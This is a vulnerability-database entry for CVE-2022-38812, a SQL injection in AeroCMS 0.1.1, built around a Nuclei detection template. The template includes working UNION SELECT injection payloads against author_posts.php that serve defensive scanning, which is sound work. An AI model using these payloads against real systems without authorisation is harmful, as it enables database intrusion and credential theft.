Lucene search
K

AeroCMS 0.1.1 - SQL Injection

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 19 Views

AeroCMS 0.1.1 suffers SQL injection via unsanitized author parameter.

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2022-38812
31 Aug 202218:15
attackerkb
Circl
CVE-2022-38812
31 Aug 202222:37
circl
CNNVD
AeroCMS SQL注入漏洞
31 Aug 202200:00
cnnvd
CVE
CVE-2022-38812
31 Aug 202217:52
cve
Cvelist
CVE-2022-38812
31 Aug 202217:52
cvelist
EUVD
EUVD-2022-41372
3 Oct 202520:07
euvd
NVD
CVE-2022-38812
31 Aug 202218:15
nvd
OSV
CVE-2022-38812
31 Aug 202218:15
osv
Prion
Sql injection
31 Aug 202218:15
prion
Positive Technologies
PT-2022-24579
31 Aug 202200:00
ptsecurity
Rows per page
id: CVE-2022-38812

info:
  name: AeroCMS 0.1.1 - SQL Injection
  author: shivampand3y
  severity: medium
  description: |
    AeroCMS 0.1.1 contains a SQL injection caused by unsanitized author parameter, letting attackers execute arbitrary SQL commands, exploit requires crafted author input.
  impact: |
    Authenticated attackers can exploit SQL injection in the author parameter to extract sensitive database information including user credentials, content data, and application configuration from the AeroCMS database.
  remediation: |
    Update AeroCMS to a version newer than 0.1.1 that properly sanitizes the author parameter and uses parameterized queries.
  reference:
    - https://www.exploit-db.com/exploits/51022
    - https://www.nu11secur1ty.com/2022/08/aerocms-v001-sqli.html
    - https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/MegaTKC/2021/AeroCMS-v0.0.1-SQLi
    - https://nvd.nist.gov/vuln/detail/CVE-2022-38812
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2022-38812
    cwe-id: CWE-89
    epss-score: 0.02181
    epss-percentile: 0.80181
  metadata:
    verified: true
    max-request: 2
    vendor: aerocms_project
    product: aerocms
  tags: cve,cve2022,aero,cms,sqli,edb,vuln

variables:
  num: "999999999"

http:
  - method: GET
    path:
      - '{{BaseURL}}/author_posts.php?author=admin%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5({{num}}),1,1),NULL,NULL,NULL,NULL--%20-&p_id=1'
      - '{{BaseURL}}/cms/author_posts.php?author=admin%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5({{num}}),1,1),NULL,NULL,NULL,NULL--%20-&p_id=1'

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{{md5(num)}}'

      - type: status
        status:
          - 200
# digest: 4a0a00473045022044631c1f41605805059dd2b70ffeec435a896f9819c7a87ab52ad8097895b7d3022100a1e967073f19bde7358c58700c054e840dcf385607007b4b4c24db94acacea7f:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.8Medium risk
Vulners AI Score6.8
CVSS 3.16.5
EPSS0.02181
19